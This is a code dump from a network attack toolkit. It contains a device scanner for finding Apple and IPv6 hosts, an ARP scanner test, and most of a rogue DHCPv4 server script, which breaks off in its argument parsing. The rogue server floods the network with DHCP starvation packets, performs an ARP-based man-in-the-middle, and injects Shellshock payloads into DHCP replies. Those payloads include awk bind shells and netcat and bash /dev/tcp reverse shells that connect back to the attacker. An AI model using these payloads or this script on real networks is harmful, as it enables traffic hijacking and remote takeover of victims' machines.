'Bad dict of IPv6 device, example: ' + \
'[{"ip-address": "fd00::1", "mac-address": "12:34:56:78:90:ab", "vendor": "Apple, Inc."}]'
assert self.base.ipv6_address_validation(ipv6_device['ip-address']), \
'Bad dict of IPv6 device, example: ' + \
'[{"ip-address": "fd00::1", "mac-address": "12:34:56:78:90:ab", "vendor": "Apple, Inc."}]'
assert 'mac-address' in ipv6_device.keys(), \
'Bad dict of IPv6 device, example: ' + \
'[{"ip-address": "fd00::1", "mac-address": "12:34:56:78:90:ab", "vendor": "Apple, Inc."}]'
assert self.base.mac_address_validation(ipv6_device['mac-address']), \
'Bad dict of IPv6 device, example: ' + \
'[{"ip-address": "fd00::1", "mac-address": "12:34:56:78:90:ab", "vendor": "Apple, Inc."}]'
assert 'vendor' in ipv6_device.keys(), \
'Bad dict of IPv6 device, example: ' + \
'[{"ip-address": "fd00::1", "mac-address": "12:34:56:78:90:ab", "vendor": "Apple, Inc."}]'
ipv6_device: Union[None, Dict[str, str]] = None
# region IPv6 devices is found
# region Only one IPv6 device found
if len(ipv6_devices) == 1:
ipv6_device: Dict[str, str] = ipv6_devices[0]
self.base.print_info('Only one IPv6 device found:')
self.base.print_success(ipv6_device['ip-address'] + ' (' + ipv6_device['mac-address'] + ') ' +
ipv6_device['vendor'])
# endregion
# region More than one IPv6 device found
            elif len(ipv6_devices) > 1:
self.base.print_success('Found ', str(len(ipv6_devices)), ' IPv6 alive hosts!')
device_index: int = 1
pretty_table = PrettyTable([self.base.info_text('Index'),
self.base.info_text('IPv6 address'),
self.base.info_text('MAC address'),
self.base.info_text('Vendor')])
for ipv6_device in ipv6_devices:
pretty_table.add_row([str(device_index), ipv6_device['ip-address'],
ipv6_device['mac-address'], ipv6_device['vendor']])
device_index += 1
print(pretty_table)
device_index -= 1
current_device_index: Union[int, str] = \
input(self.base.c_info + 'Set device index from range (1-' + str(device_index) + '): ')
assert current_device_index.isdigit(), \
'Your input data is not digit!'
current_device_index: int = int(current_device_index)
assert not any([current_device_index < 1, current_device_index > device_index]), \
'Your number is not within range (1-' + str(device_index) + ')'
current_device_index: int = int(current_device_index) - 1
ipv6_device: Dict[str, str] = ipv6_devices[current_device_index]
# endregion
# endregion
# region IPv6 devices not found
else:
if exit_on_failure:
self.base.print_error('Could not find IPv6 devices!')
exit(1)
# endregion
return ipv6_device
except KeyboardInterrupt:
self.base.print_info('Exit')
exit(0)
except AssertionError as Error:
self.base.print_error(Error.args[0])
if exit_on_failure:
exit(1)
return None
# endregion
# region Find all devices in local network
def find_ip_in_local_network(self,
network_interface: str = 'eth0',
timeout: int = 3, retry: int = 3,
show_scan_percentage: bool = True,
exit_on_failure: bool = True) -> Union[None, List[str]]:
try:
local_network_ip_addresses: List[str] = list()
arp_scan_results = self.arp_scan.scan(network_interface=network_interface, timeout=timeout,
retry=retry, exit_on_failure=False, check_vendor=True,
show_scan_percentage=show_scan_percentage)
assert len(arp_scan_results) != 0, \
'Could not find network devices on interface: ' + self.base.error_text(network_interface)
for device in arp_scan_results:
if self.base.ip_address_validation(device['ip-address']):
local_network_ip_addresses.append(device['ip-address'])
return local_network_ip_addresses
except KeyboardInterrupt:
self.base.print_info('Exit')
exit(0)
except AssertionError as Error:
self.base.print_error(Error.args[0])
if exit_on_failure:
exit(1)
return None
# endregion
# region Find Apple devices in local network with arp_scan
def find_apple_devices_by_mac(self, network_interface: str = 'eth0',
timeout: int = 3, retry: int = 3,
show_scan_percentage: bool = True,
exit_on_failure: bool = True) -> Union[None, List[List[str]]]:
try:
apple_devices: List[List[str]] = list()
arp_scan_results = self.arp_scan.scan(network_interface=network_interface, timeout=timeout,
retry=retry, exit_on_failure=False, check_vendor=True,
show_scan_percentage=show_scan_percentage)
assert len(arp_scan_results) != 0, \
'Could not find network devices on interface: ' + self.base.error_text(network_interface)
for device in arp_scan_results:
if 'Apple' in device['vendor']:
apple_devices.append([device['ip-address'], device['mac-address'], device['vendor']])
assert len(apple_devices) != 0, \
'Could not find Apple devices on interface: ' + self.base.error_text(network_interface)
return apple_devices
except KeyboardInterrupt:
self.base.print_info('Exit')
exit(0)
except AssertionError as Error:
self.base.print_error(Error.args[0])
if exit_on_failure:
exit(1)
return None
# endregion
# region Find Apple devices in local network with ICMPv6 scan
def find_apple_devices_by_mac_ipv6(self, network_interface: str = 'eth0',
timeout: int = 5, retry: int = 3,
exit_on_failure: bool = True) -> Union[None, List[List[str]]]:
try:
apple_devices: List[List[str]] = list()
icmpv6_scan_results = self.icmpv6_scan.scan(network_interface=network_interface, timeout=timeout,
retry=retry, exit_on_failure=False, check_vendor=True)
assert len(icmpv6_scan_results) != 0, \
'Could not find IPv6 network devices on interface: ' + self.base.error_text(network_interface)
for device in icmpv6_scan_results:
if 'Apple' in device['vendor']:
apple_devices.append([device['ip-address'], device['mac-address'], device['vendor']])
assert len(apple_devices) != 0, \
'Could not find Apple devices on interface: ' + self.base.error_text(network_interface)
return apple_devices
except KeyboardInterrupt:
self.base.print_info('Exit')
exit(0)
except AssertionError as Error:
self.base.print_error(Error.args[0])
if exit_on_failure:
exit(1)
return None
# endregion
# region Find IPv6 devices in local network with icmpv6_scan
def find_ipv6_devices(self, network_interface: str = 'eth0',
timeout: int = 5, retry: int = 3,
exclude_ipv6_addresses: Union[None, List[str]] = None,
exit_on_failure: bool = True) -> Union[None, List[Dict[str, str]]]:
try:
ipv6_devices: List[Dict[str, str]] = list()
ipv6_scan_results = self.icmpv6_scan.scan(network_interface=network_interface, timeout=timeout, retry=retry,
target_mac_address=None, check_vendor=True, exit_on_failure=False)
assert len(ipv6_scan_results) != 0, \
'Could not find IPv6 network devices on interface: ' + self.base.error_text(network_interface)
for device in ipv6_scan_results:
if exclude_ipv6_addresses is not None:
if device['ip-address'] not in exclude_ipv6_addresses:
ipv6_devices.append(device)
else:
ipv6_devices.append(device)
assert len(ipv6_devices) != 0, \
'Could not find IPv6 devices on interface: ' + self.base.error_text(network_interface)
return ipv6_devices
except KeyboardInterrupt:
self.base.print_info('Exit')
exit(0)
except AssertionError as Error:
self.base.print_error(Error.args[0])
if exit_on_failure:
exit(1)
return None
# endregion
# region Find Apple devices in local network with nmap
def find_apple_devices_with_nmap(self, network_interface: str = 'eth0',
exit_on_failure: bool = True) -> Union[None, List[List[str]]]:
try:
if isfile(Scanner.nmap_scan_result):
remove(Scanner.nmap_scan_result)
local_network_devices: List[List[str]] = list()
apple_devices: List[List[str]] = list()
local_network = self.base.get_first_ip_on_interface(network_interface) + '-' + \
self.base.get_last_ip_on_interface(network_interface).split('.')[3]
self.base.print_info('Start nmap scan: ', 'nmap ' + local_network + ' -n -O --osscan-guess -T5 -e ' +
network_interface + ' -oX ' + Scanner.nmap_scan_result)
nmap_process = sub.Popen(['nmap ' + local_network + ' -n -O --osscan-guess -T5 -e ' +
network_interface + ' -oX ' + Scanner.nmap_scan_result],
shell=True, stdout=sub.PIPE)
nmap_process.wait()
nmap_report = ET.parse(Scanner.nmap_scan_result)
root_tree = nmap_report.getroot()
for element in root_tree:
if element.tag == 'host':
state = element.find('status').attrib['state']
if state == 'up':
ip_address: str = ''
mac_address: str = ''
description: str = ''
for address in element.findall('address'):
if address.attrib['addrtype'] == 'ipv4':
ip_address = address.attrib['addr']
if address.attrib['addrtype'] == 'mac':
mac_address = address.attrib['addr'].lower()
try:
description = address.attrib['vendor'] + ' device'
except KeyError:
pass
for os_info in element.find('os'):
if os_info.tag == 'osmatch':
try:
description += ', ' + os_info.attrib['name']
except TypeError:
pass
break
local_network_devices.append([ip_address, mac_address, description])
assert len(local_network_devices) != 0, \
'Could not find any devices on interface: ' + self.base.error_text(network_interface)
for network_device in local_network_devices:
if 'Apple' in network_device[2] or 'Mac OS' in network_device[2] or 'iOS' in network_device[2]:
apple_devices.append(network_device)
assert len(apple_devices) != 0, \
'Could not find Apple devices on interface: ' + self.base.error_text(network_interface)
return apple_devices
except OSError:
self.base.print_error('Something went wrong while trying to run ', '`nmap`')
exit(2)
except KeyboardInterrupt:
self.base.print_info('Exit')
exit(0)
except AssertionError as Error:
self.base.print_error(Error.args[0])
if exit_on_failure:
exit(1)
return None
# endregion
# endregion
```
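A minimal usage sketch for the `Scanner` wrapper above; the import path and interface name are assumptions based on the paths shown in this excerpt, and scanning requires root privileges:
```python
from raw_packet.Scanners.scanner import Scanner

if __name__ == '__main__':
    scanner = Scanner()

    # ARP-scan 'eth0' for Apple devices and let the operator pick one.
    apple_devices = scanner.find_apple_devices_by_mac(network_interface='eth0',
                                                      timeout=3, retry=3,
                                                      exit_on_failure=False)
    if apple_devices is not None:
        target = scanner.apple_device_selection(apple_devices)
        print('Selected target:', target)
```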
#### File: Unit_tests/Scanners/test_arp_scanner.py
```python
from sys import path
from os.path import dirname, abspath
import unittest
# endregion
# region Authorship information
__author__ = '<NAME>'
__copyright__ = 'Copyright 2020, Raw-packet Project'
__credits__ = ['']
__license__ = 'MIT'
__version__ = '0.2.1'
__maintainer__ = '<NAME>'
__email__ = '<EMAIL>'
__status__ = 'Development'
# endregion
# region Main class - NetworkTest
class ArpScanTest(unittest.TestCase):
# region Properties
path.append(dirname(dirname(dirname(dirname(dirname(abspath(__file__)))))))
from raw_packet.Scanners.arp_scanner import ArpScan
from raw_packet.Tests.Unit_tests.variables import Variables
arp_scan: ArpScan = ArpScan()
# endregion
def test01_scan(self):
arp_scan_results = self.arp_scan.scan(network_interface=ArpScanTest.Variables.test_network_interface,
timeout=1, retry=1, show_scan_percentage=False)
self.assertIsNotNone(arp_scan_results)
find_router_mac: bool = False
find_router_ip: bool = False
for arp_scan_result in arp_scan_results:
if arp_scan_result['mac-address'] == ArpScanTest.Variables.router_mac_address:
find_router_mac = True
if arp_scan_result['ip-address'] == ArpScanTest.Variables.router_ipv4_address:
find_router_ip = True
self.assertTrue(find_router_mac)
self.assertTrue(find_router_ip)
def test02_scan_with_exclude(self):
arp_scan_results = self.arp_scan.scan(network_interface=ArpScanTest.Variables.test_network_interface,
timeout=1, retry=1, show_scan_percentage=False,
exclude_ip_addresses=[ArpScanTest.Variables.router_ipv4_address],
exit_on_failure=False)
find_router_mac: bool = False
find_router_ip: bool = False
for arp_scan_result in arp_scan_results:
if arp_scan_result['mac-address'] == ArpScanTest.Variables.router_mac_address:
find_router_mac = True
if arp_scan_result['ip-address'] == ArpScanTest.Variables.router_ipv4_address:
find_router_ip = True
self.assertFalse(find_router_mac)
self.assertFalse(find_router_ip)
def test03_get_mac_address(self):
mac_address = self.arp_scan.get_mac_address(network_interface=ArpScanTest.Variables.test_network_interface,
target_ip_address=ArpScanTest.Variables.router_ipv4_address,
timeout=1, retry=1, show_scan_percentage=False)
self.assertEqual(mac_address, ArpScanTest.Variables.router_mac_address)
# endregion
```
#### File: Scripts/DHCPv4/dhcp_rogue_server.py
```python
from sys import path
from os.path import dirname, abspath
from sys import exit
from argparse import ArgumentParser
from socket import socket, AF_PACKET, SOCK_RAW, htons
from os import makedirs
from shutil import copyfile
from base64 import b64encode
from netaddr import IPAddress
from time import sleep
from random import randint
from typing import Union, List, Dict
import subprocess as sub
# endregion
# region Authorship information
__author__ = '<NAME>'
__copyright__ = 'Copyright 2020, Raw-packet Project'
__credits__ = ['']
__license__ = 'MIT'
__version__ = '0.2.1'
__maintainer__ = '<NAME>'
__email__ = '<EMAIL>'
__status__ = 'Development'
# endregion
# region Get free IP addresses in local network
def get_free_ip_addresses() -> None:
# Get all IP addresses in range from first to last offer IP address
current_ip_address = first_offer_ip_address
while base.ip_address_compare(current_ip_address, last_offer_ip_address, 'le'):
free_ip_addresses.append(current_ip_address)
current_ip_address = base.ip_address_increment(current_ip_address)
base.print_info('ARP scan on interface: ', current_network_interface, ' is running ...')
alive_hosts = scanner.find_ip_in_local_network(current_network_interface)
for ip_address in alive_hosts:
try:
free_ip_addresses.remove(ip_address)
except ValueError:
pass
# endregion
# region Add client info in clients dictionary
def add_client_info_in_dictionary(client_mac_address: str,
client_info: Union[bool, str, Dict[str, Union[bool, str]]],
this_client_already_in_dictionary: bool = False) -> None:
if this_client_already_in_dictionary:
clients[client_mac_address].update(client_info)
else:
clients[client_mac_address] = client_info
# endregion
# region Make DHCP offer packet
def make_dhcp_offer_packet(transaction_id: int, offer_ip: str, client_mac: str,
destination_mac: Union[None, str] = None,
destination_ip: Union[None, str] = None) -> Union[None, bytes]:
if destination_mac is None:
destination_mac = 'ff:ff:ff:ff:ff:ff'
if destination_ip is None:
destination_ip = '255.255.255.255'
return dhcp.make_response_packet(ethernet_src_mac=dhcp_server_mac_address,
ethernet_dst_mac=destination_mac,
ip_src=dhcp_server_ip_address,
ip_dst=destination_ip,
transaction_id=transaction_id,
dhcp_message_type=2,
your_client_ip=offer_ip,
client_mac=client_mac,
dhcp_server_id=dhcp_server_ip_address,
lease_time=args.lease_time,
netmask=network_mask,
router=router_ip_address,
dns=dns_server_ip_address,
payload=None)
# endregion
# region Make DHCP ack packet
def make_dhcp_ack_packet(transaction_id: int, target_mac: str, target_ip: str,
destination_mac: Union[None, str] = None,
destination_ip: Union[None, str] = None,
shellshock_payload: Union[None, str] = None) -> Union[None, bytes]:
if destination_mac is None:
destination_mac: str = 'ff:ff:ff:ff:ff:ff'
if destination_ip is None:
destination_ip: str = '255.255.255.255'
if wpad_url is not None:
wpad_url_bytes = wpad_url.encode('utf-8')
else:
wpad_url_bytes = None
return dhcp.make_response_packet(ethernet_src_mac=dhcp_server_mac_address,
ethernet_dst_mac=destination_mac,
ip_src=dhcp_server_ip_address,
ip_dst=destination_ip,
transaction_id=transaction_id,
dhcp_message_type=5,
your_client_ip=target_ip,
client_mac=target_mac,
dhcp_server_id=dhcp_server_ip_address,
lease_time=args.lease_time,
netmask=network_mask,
router=router_ip_address,
dns=dns_server_ip_address,
payload=shellshock_payload,
payload_option_code=args.shellshock_option_code,
proxy=wpad_url_bytes,
domain=domain,
tftp=tftp_server_ip_address,
wins=wins_server_ip_address)
# endregion
# region Make DHCP nak packet
def make_dhcp_nak_packet(transaction_id: int, target_mac: str,
target_ip: str, requested_ip: str) -> Union[None, bytes]:
return dhcp.make_nak_packet(ethernet_src_mac=dhcp_server_mac_address,
ethernet_dst_mac=target_mac,
ip_src=dhcp_server_ip_address,
ip_dst=requested_ip,
transaction_id=transaction_id,
your_client_ip=target_ip,
client_mac=target_mac,
dhcp_server_id=dhcp_server_ip_address)
# return dhcp.make_nak_packet(source_mac=dhcp_server_mac_address,
# destination_mac=target_mac,
# source_ip=dhcp_server_ip_address,
# destination_ip=requested_ip,
# transaction_id=transaction_id,
# your_ip=target_ip,
# client_mac=target_mac,
# dhcp_server_id=dhcp_server_ip_address)
# endregion
# region Send DHCP discover packets
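# discover_sender() floods the segment with DHCP DISCOVER packets carrying
# randomized client MAC addresses and hostnames (DHCP starvation), so the
# legitimate server's address pool is exhausted before real clients are served.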
def discover_sender(number_of_packets=999999) -> None:
packet_index = 0
discover_socket = socket(AF_PACKET, SOCK_RAW)
discover_socket.bind((current_network_interface, 0))
if dhcp_discover_packets_source_mac != your_mac_address:
relay_agent_ip_address = base.get_random_ip_on_interface(current_network_interface)
else:
relay_agent_ip_address = your_ip_address
while packet_index < number_of_packets:
try:
discover_socket.send(dhcp.make_discover_packet(ethernet_src_mac=dhcp_discover_packets_source_mac,
client_mac=eth.make_random_mac(),
host_name=base.make_random_string(),
relay_agent_ip=relay_agent_ip_address))
sleep(args.discover_delay)
except TypeError:
base.print_error('Something went wrong when sending DHCP discover packets!')
break
packet_index += 1
discover_socket.close()
# endregion
# region Reply to DHCP and ARP requests
def reply(request):
# region Define global variables
# global raw_socket
# global clients
# global target_ip_address
# global router_ip_address
# global payload
# global shellshock_payload
# global args
# global discover_sender_is_work
# endregion
# region DHCP
if 'DHCPv4' in request.keys():
# region Get transaction id and client MAC address
transaction_id = request['BOOTP']['transaction-id']
client_mac_address = request['BOOTP']['client-mac-address']
# endregion
# region Check this client already in dict
client_already_in_dictionary = False
if client_mac_address in clients.keys():
client_already_in_dictionary = True
# endregion
# region DHCP DISCOVER
if request['DHCPv4'][53] == 1:
# region Print INFO message
base.print_info('DHCP DISCOVER from: ', client_mac_address, ' transaction id: ', hex(transaction_id))
# endregion
# If parameter 'Do not send DHCP OFFER packets' is not set
if not args.dnsop:
# region Start DHCP discover sender
if args.send_discover:
if not discover_sender_is_work:
discover_sender(100)
# endregion
# If target IP address is set - offer IP = target IP
if target_ip_address is not None:
offer_ip_address = target_ip_address
# If target IP address is not set - offer IP = random IP from free IP addresses list
else:
                    random_index = randint(0, len(free_ip_addresses) - 1)
offer_ip_address = free_ip_addresses[random_index]
# Delete offer IP from free IP addresses list
del free_ip_addresses[random_index]
if args.broadcast_response:
offer_packet = make_dhcp_offer_packet(transaction_id, offer_ip_address, client_mac_address)
else:
offer_packet = make_dhcp_offer_packet(transaction_id, offer_ip_address, client_mac_address,
client_mac_address, offer_ip_address)
raw_socket.send(offer_packet)
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{'transaction': transaction_id, 'discover': True,
'offer_ip': offer_ip_address},
client_already_in_dictionary)
# Print INFO message
base.print_info('DHCP OFFER to: ', client_mac_address, ' offer IP: ', offer_ip_address)
# endregion
# region DHCP RELEASE
if request['DHCPv4'][53] == 7:
if request['BOOTP']['client-ip-address'] is not None:
client_ip = request['BOOTP']['client-ip-address']
base.print_info('DHCP RELEASE from: ', client_ip + ' (' + client_mac_address + ')',
' transaction id: ', hex(transaction_id))
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{'client_ip': client_ip},
client_already_in_dictionary)
# print clients
# Add release client IP in free IP addresses list
if client_ip not in free_ip_addresses:
free_ip_addresses.append(client_ip)
else:
base.print_info('DHCP RELEASE from: ', client_mac_address, ' transaction id: ', hex(transaction_id))
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{'release': True},
client_already_in_dictionary)
# print clients
# endregion
# region DHCP INFORM
if request['DHCPv4'][53] == 8:
if request['BOOTP']['client-ip-address'] is not None:
client_ip = request['BOOTP']['client-ip-address']
base.print_info('DHCP INFORM from: ', client_ip + ' (' + client_mac_address + ')',
' transaction id: ', hex(transaction_id))
# If client IP in free IP addresses list delete this
if client_ip in free_ip_addresses:
free_ip_addresses.remove(client_ip)
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{'client_ip': client_ip},
client_already_in_dictionary)
# print clients
else:
base.print_info('DHCP INFORM from: ', client_mac_address, ' transaction id: ', hex(transaction_id))
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{'inform': True},
client_already_in_dictionary)
# print clients
# endregion
# region DHCP REQUEST
if request['DHCPv4'][53] == 3:
# region Set local variables
requested_ip = '0.0.0.0'
offer_ip = None
# endregion
# region Get requested IP
if 50 in request['DHCPv4'].keys():
requested_ip = str(request['DHCPv4'][50])
# endregion
# region Print info message
base.print_info('DHCP REQUEST from: ', client_mac_address, ' transaction id: ', hex(transaction_id),
' requested ip: ', requested_ip)
# endregion
# region Requested IP not in range from first offer IP to last offer IP
if not base.ip_address_in_range(requested_ip, first_offer_ip_address, last_offer_ip_address):
base.print_warning('Client: ', client_mac_address, ' requested IP: ', requested_ip,
' not in range: ', first_offer_ip_address + ' - ' + last_offer_ip_address)
# endregion
# region Requested IP in range from first offer IP to last offer IP
else:
# region Start DHCP discover sender
if args.send_discover:
if not discover_sender_is_work:
discover_sender(100)
# endregion
# region Change client info in global clients dictionary
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{'request': True, 'requested_ip': requested_ip,
'transaction': transaction_id},
client_already_in_dictionary)
# Delete ARP mitm success keys in dictionary for this client
clients[client_mac_address].pop('client request his ip', None)
clients[client_mac_address].pop('client request router ip', None)
clients[client_mac_address].pop('client request dns ip', None)
# endregion
# region Get offer IP address
try:
offer_ip = clients[client_mac_address]['offer_ip']
except KeyError:
pass
# endregion
# region This client already send DHCP DISCOVER and offer IP != requested IP
if offer_ip is not None and offer_ip != requested_ip:
# Print error message
base.print_error('Client: ', client_mac_address, ' requested IP: ', requested_ip,
' not like offer IP: ', offer_ip)
# Create and send DHCP nak packet
nak_packet = make_dhcp_nak_packet(transaction_id, client_mac_address, offer_ip, requested_ip)
raw_socket.send(nak_packet)
base.print_info('DHCP NAK to: ', client_mac_address, ' requested ip: ', requested_ip)
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{'mitm': 'error: offer ip not like requested ip', 'offer_ip': None},
client_already_in_dictionary)
# print clients
# endregion
# region Offer IP == requested IP or this is a first request from this client
else:
# region Target IP address is set and requested IP != target IP
if target_ip_address is not None and requested_ip != target_ip_address:
# Print error message
base.print_error('Client: ', client_mac_address, ' requested IP: ', requested_ip,
' not like target IP: ', target_ip_address)
# Create and send DHCP nak packet
nak_packet = make_dhcp_nak_packet(transaction_id, client_mac_address,
target_ip_address, requested_ip)
raw_socket.send(nak_packet)
base.print_info('DHCP NAK to: ', client_mac_address, ' requested ip: ', requested_ip)
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{'mitm': 'error: target ip not like requested ip',
'offer_ip': None, 'nak': True},
client_already_in_dictionary)
# endregion
# region Target IP address is set and requested IP == target IP or Target IP is not set
else:
# region Settings shellshock payload
payload: Union[None, str] = None
shellshock_payload: Union[None, str] = None
try:
assert args.shellshock_command is not None \
or args.bind_shell \
or args.nc_reverse_shell \
or args.nce_reverse_shell \
or args.bash_reverse_shell, 'ShellShock not used!'
# region Create payload
# Network settings command in target machine
net_settings = args.ip_path + 'ip addr add ' + requested_ip + '/' + \
str(IPAddress(network_mask).netmask_bits()) + ' dev ' + args.iface_name + ';'
# Shellshock payload: <user bash command>
if args.shellshock_command is not None:
payload = args.shellshock_command
# Shellshock payload:
# awk 'BEGIN{s='/inet/tcp/<bind_port>/0/0';for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}' &
if args.bind_shell:
payload = 'awk \'BEGIN{s=\'/inet/tcp/' + str(args.bind_port) + \
'/0/0\';for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}\' &'
# Shellshock payload:
# rm /tmp/f 2>/dev/null;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your_ip> <your_port> >/tmp/f &
if args.nc_reverse_shell:
payload = 'rm /tmp/f 2>/dev/null;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ' + \
your_ip_address + ' ' + str(args.reverse_port) + ' >/tmp/f &'
# Shellshock payload:
# /bin/nc -e /bin/sh <your_ip> <your_port> 2>&1 &
if args.nce_reverse_shell:
payload = '/bin/nc -e /bin/sh ' + your_ip_address + ' ' + str(args.reverse_port) + ' 2>&1 &'
# Shellshock payload:
# /bin/bash -i >& /dev/tcp/<your_ip>/<your_port> 0>&1 &
if args.bash_reverse_shell:
payload = '/bin/bash -i >& /dev/tcp/' + your_ip_address + \
'/' + str(args.reverse_port) + ' 0>&1 &'
if payload is not None:
# Do not add network settings command in payload
if not args.without_network:
payload = net_settings + payload
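                                # Editor's note: the '() { :; }; ' prefix used below is
                                # the empty bash function definition that triggers the
                                # Shellshock bug (CVE-2014-6271) in vulnerable DHCP clients.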
# Send payload to target in clear text
if args.without_base64:
shellshock_payload = '() { :; }; ' + payload
# Send base64 encoded payload to target in clear text
else:
                                    payload = b64encode(payload.encode('utf-8')).decode('utf-8')
                                    shellshock_payload = '() { :; }; /bin/sh <(/usr/bin/base64 -d <<< ' + payload + ')'
# endregion
# region Check Shellshock payload length
if shellshock_payload is not None:
if len(shellshock_payload) > 255:
base.print_error('Length of shellshock payload is very big! Current length: ',
str(len(shellshock_payload)), ' Maximum length: ', '254')
shellshock_payload = None
# endregion
except AssertionError:
pass
# endregion
# region Send DHCP ack and print info message
if args.broadcast_response:
ack_packet = make_dhcp_ack_packet(transaction_id=transaction_id,
target_mac=client_mac_address,
target_ip=requested_ip,
shellshock_payload=shellshock_payload)
else:
ack_packet = make_dhcp_ack_packet(transaction_id=transaction_id,
target_mac=client_mac_address,
target_ip=requested_ip,
destination_mac=client_mac_address,
destination_ip=requested_ip,
shellshock_payload=shellshock_payload)
if args.apple:
base.print_info('DHCP ACK to: ', client_mac_address, ' requested ip: ', requested_ip)
for _ in range(3):
raw_socket.send(ack_packet)
sleep(0.2)
else:
raw_socket.send(ack_packet)
base.print_info('DHCP ACK to: ', client_mac_address, ' requested ip: ', requested_ip)
# endregion
# region Add client info in global clients dictionary
try:
clients[client_mac_address].update({'mitm': 'success'})
except KeyError:
clients[client_mac_address] = {'mitm': 'success'}
# endregion
# endregion
# endregion
# endregion
# endregion
# region DHCP DECLINE
if request['DHCPv4'][53] == 4:
# Get requested IP
requested_ip = '0.0.0.0'
if 50 in request['DHCPv4'].keys():
requested_ip = str(request['DHCPv4'][50])
# Print info message
base.print_info('DHCP DECLINE from: ', requested_ip + ' (' + client_mac_address + ')',
' transaction id: ', hex(transaction_id))
# If client IP in free IP addresses list delete this
if requested_ip in free_ip_addresses:
free_ip_addresses.remove(requested_ip)
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{'decline_ip': requested_ip, 'decline': True},
client_already_in_dictionary)
# print clients
# endregion
# endregion DHCP
# region ARP
if 'ARP' in request.keys():
if request['Ethernet']['destination'] == 'ff:ff:ff:ff:ff:ff' and \
request['ARP']['target-mac'] == '00:00:00:00:00:00':
# region Set local variables
arp_sender_mac_address = request['ARP']['sender-mac']
arp_sender_ip_address = request['ARP']['sender-ip']
arp_target_ip_address = request['ARP']['target-ip']
# endregion
# region Print info message
base.print_info('ARP request from: ', arp_sender_mac_address,
' "Who has ', arp_target_ip_address, ' Tell ', arp_sender_ip_address, '"')
# endregion
# region Get client mitm status
try:
mitm_status = clients[arp_sender_mac_address]['mitm']
except KeyError:
mitm_status = ''
# endregion
# region Get client requested ip
try:
requested_ip = clients[arp_sender_mac_address]['requested_ip']
except KeyError:
requested_ip = ''
# endregion
# region Create IPv4 address conflict
if mitm_status.startswith('error'):
arp_reply = arp.make_response(ethernet_src_mac=your_mac_address,
ethernet_dst_mac=arp_sender_mac_address,
sender_mac=your_mac_address, sender_ip=arp_target_ip_address,
target_mac=arp_sender_mac_address, target_ip=arp_sender_ip_address)
raw_socket.send(arp_reply)
base.print_info('ARP response to: ', arp_sender_mac_address,
' \'', arp_target_ip_address + ' is at ' + your_mac_address,
'\' (IPv4 address conflict)')
# endregion
# region MITM success
if mitm_status.startswith('success'):
if arp_target_ip_address == requested_ip:
clients[arp_sender_mac_address].update({'client request his ip': True})
if arp_target_ip_address == router_ip_address:
clients[arp_sender_mac_address].update({'client request router ip': True})
if arp_target_ip_address == dns_server_ip_address:
clients[arp_sender_mac_address].update({'client request dns ip': True})
try:
test = clients[arp_sender_mac_address]['client request his ip']
test = clients[arp_sender_mac_address]['client request router ip']
test = clients[arp_sender_mac_address]['client request dns ip']
try:
test = clients[arp_sender_mac_address]['success message']
except KeyError:
if args.exit:
sleep(3)
base.print_success('MITM success: ', requested_ip + ' (' + arp_sender_mac_address + ')')
exit(0)
else:
base.print_success('MITM success: ', requested_ip + ' (' + arp_sender_mac_address + ')')
clients[arp_sender_mac_address].update({'success message': True})
except KeyError:
pass
# endregion
# endregion
# endregion
# region Main function
if __name__ == '__main__':
# region import Raw-packet classes
path.append(dirname(dirname(dirname(abspath(__file__)))))
utils_path = dirname(dirname(dirname(abspath(__file__)))) + '/raw_packet/Utils/'
from raw_packet.Utils.base import Base
from raw_packet.Utils.network import RawEthernet, RawARP, RawIPv4, RawUDP, RawDHCPv4
from raw_packet.Utils.tm import ThreadManager
from raw_packet.Scanners.scanner import Scanner
# endregion
# region Init Raw-packet classes
base: Base = Base()
scanner: Scanner = Scanner()
eth: RawEthernet = RawEthernet()
arp: RawARP = RawARP()
ip: RawIPv4 = RawIPv4()
udp: RawUDP = RawUDP()
dhcp: RawDHCPv4 = RawDHCPv4()
# endregion
try:
# region Check user, platform and create threads
base.check_user()
base.check_platform()
tm = ThreadManager(3)
# endregion
# region Parse script arguments
parser = ArgumentParser(description='Rogue DHCPv4 server')
parser.add_argument('-i', '--interface', help='Set interface name for send reply packets')
parser.add_argument('-f', '--first_offer_ip', type=str, help='Set first client ip for offering', default=None)
parser.add_argument('-l', '--last_offer_ip', type=str, help='Set last client ip for offering', default=None)
parser.add_argument('-t', '--target_mac', type=str, help='Set target MAC address', default=None)
parser.add_argument('-T', '--target_ip', type=str, help='Set client IP address with MAC in --target_mac',
default=None)
parser.add_argument('-m', '--netmask', type=str, help='Set network mask', default=None)
parser.add_argument('--dhcp_mac', type=str, help='Set DHCP server MAC address, if not set use your MAC address',
default=None)
parser.add_argument('--dhcp_ip', type=str, help='Set DHCP server IP address, if not set use your IP address',
default=None)
parser.add_argument('--router', type=str, help='Set router IP address, if not set use your ip address',
default=None)
parser.add_argument('--dns', type=str, help='Set DNS server IP address, if not set use your ip address',
default=None)
parser.add_argument('--tftp', type=str, help='Set TFTP server IP address', default=None)
parser.add_argument('--wins', type=str, help='Set WINS server IP address', default=None)
parser.add_argument('--proxy', type=str, help='Set Proxy URL, example: 192.168.0.1:8080', default=None)
parser.add_argument('--domain', type=str, help='Set domain name for search, default=local', default='local')
parser.add_argument('--lease_time', type=int, help='Set lease time, default=172800', default=172800)
parser.add_argument('-s', '--send_discover', action='store_true',
help='Send DHCP discover packets in the background thread')
parser.add_argument('-r', '--discover_rand_mac', action='store_true',
help='Use random MAC address for source MAC address in DHCP discover packets')
parser.add_argument('-d', '--discover_delay', type=float,
help='Set delay between DHCP discover packets (default=0.5 sec.)', default=0.5)
parser.add_argument('-O', '--shellshock_option_code', type=int,
help='Set dhcp option code for inject shellshock payload, default=114', default=114)
